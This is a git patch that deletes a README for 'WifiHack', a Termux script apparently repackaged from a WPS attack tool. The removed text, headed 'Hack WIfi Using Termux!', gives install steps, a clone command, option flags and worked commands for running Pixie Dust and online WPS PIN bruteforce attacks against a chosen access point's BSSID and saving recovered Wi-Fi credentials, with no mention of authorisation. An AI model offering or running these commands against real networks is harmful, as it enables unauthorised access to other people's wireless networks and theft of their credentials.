From 94616216a87137e4dcf32f31d070938905e07f01 Mon Sep 17 00:00:00 2001 From: FARHAN-SUPERUSERS <124022055+Gtajisan@users.noreply.github.com> Date: Mon, 25 Sep 2023 22:39:58 +0600 Subject: [PATCH] Delete README.md --- README.md | 93 ------------------------------------------------------- 1 file changed, 93 deletions(-) delete mode 100644 README.md diff --git a/README.md b/README.md deleted file mode 100644 index 46202bc..0000000 --- a/README.md +++ /dev/null @@ -1,93 +0,0 @@ - -### Hack WIfi Using Termux! (Requires Root) -

- -## [Termux](https://termux.com/) -Please note that root access is required. - -### Manually -**Installing requirements** - ``` - pkg install -y root-repo - ``` - ``` - pkg install -y git tsu python wpa-supplicant pixiewps iw openssl - ``` -### Getting WifiHack - ``` - git clone --depth 1 https://github.com/Gtajisan/WifiHack - ``` - ``` - cd WifiHack - ``` -### Running - ``` - sudo python binod.py -i wlan0 -K - ``` -### One line Command - ``` - sudo python WifiHack/binod.py -i wlan0 -K - ``` - -# Usage -``` - binod.py - Required arguments: - -i, --interface= : Name of the interface to use - - Optional arguments: - -b, --bssid= : BSSID of the target AP - -p, --pin= : Use the specified pin (arbitrary string or 4/8 digit pin) - -K, --pixie-dust : Run Pixie Dust attack - -B, --bruteforce : Run online bruteforce attack - --push-button-connect : Run WPS push button connection - - Advanced arguments: - -d, --delay= : Set the delay between pin attempts [0] - -w, --write : Write AP credentials to the file on success - -F, --pixie-force : Run Pixiewps with --force option (bruteforce full range) - -X, --show-pixie-cmd : Alway print Pixiewps command - --vuln-list= : Use custom file with vulnerable devices list ['vulnwsc.txt'] - --iface-down : Down network interface when the work is finished - -l, --loop : Run in a loop - -r, --reverse-scan : Reverse order of networks in the list of networks. Useful on small displays - --mtk-wifi : Activate MediaTek Wi-Fi interface driver on startup and deactivate it on exit - (for internal Wi-Fi adapters implemented in MediaTek SoCs). Turn off Wi-Fi in the system settings before using this. - -v, --verbose : Verbose output - ``` - -## Usage examples -Start Pixie Dust attack on a specified BSSID: - ``` - sudo python3 binod.py -i wlan0 -b 00:90:4C:C1:AC:21 -K - ``` -Show avaliable networks and start Pixie Dust attack on a specified network: - ``` - sudo python3 binod.py -i wlan0 -K - ``` -Launch online WPS bruteforce with the specified first half of the PIN: - ``` - sudo python3 binod.py -i wlan0 -b 00:90:4C:C1:AC:21 -B -p 1234 - ``` - Start WPS push button connection:s - ``` - sudo python3 binod.py -i wlan0 --pbc - ``` -## Troubleshooting -#### "RTNETLINK answers: Operation not possible due to RF-kill" - Just run: -```sudo rfkill unblock wifi``` -#### "Device or resource busy (-16)" - Try disabling Wi-Fi in the system settings and kill the Network manager. Alternatively, you can try running OneShot with ```--iface-down``` argument. -#### The wlan0 interface disappears when Wi-Fi is disabled on Android devices with MediaTek SoC - Try running WifiHack with the `--mtk-wifi` flag to initialize Wi-Fi device driver. -# Acknowledgements -## Special Than all root users -* FARHAN X ME -## [Facebook](https://www.facebook.com/profile.php?id=100094924471568&mibextid=ZbWKwL) - -## [Whatsapp](https://wa.me/+880130505723*) - -## Thanks For Using This Tool πŸΈπŸ™„ -## ki obsta 🀑 -## cd WifiHack sudo python WifiHack/binod.py -i wlan0 -K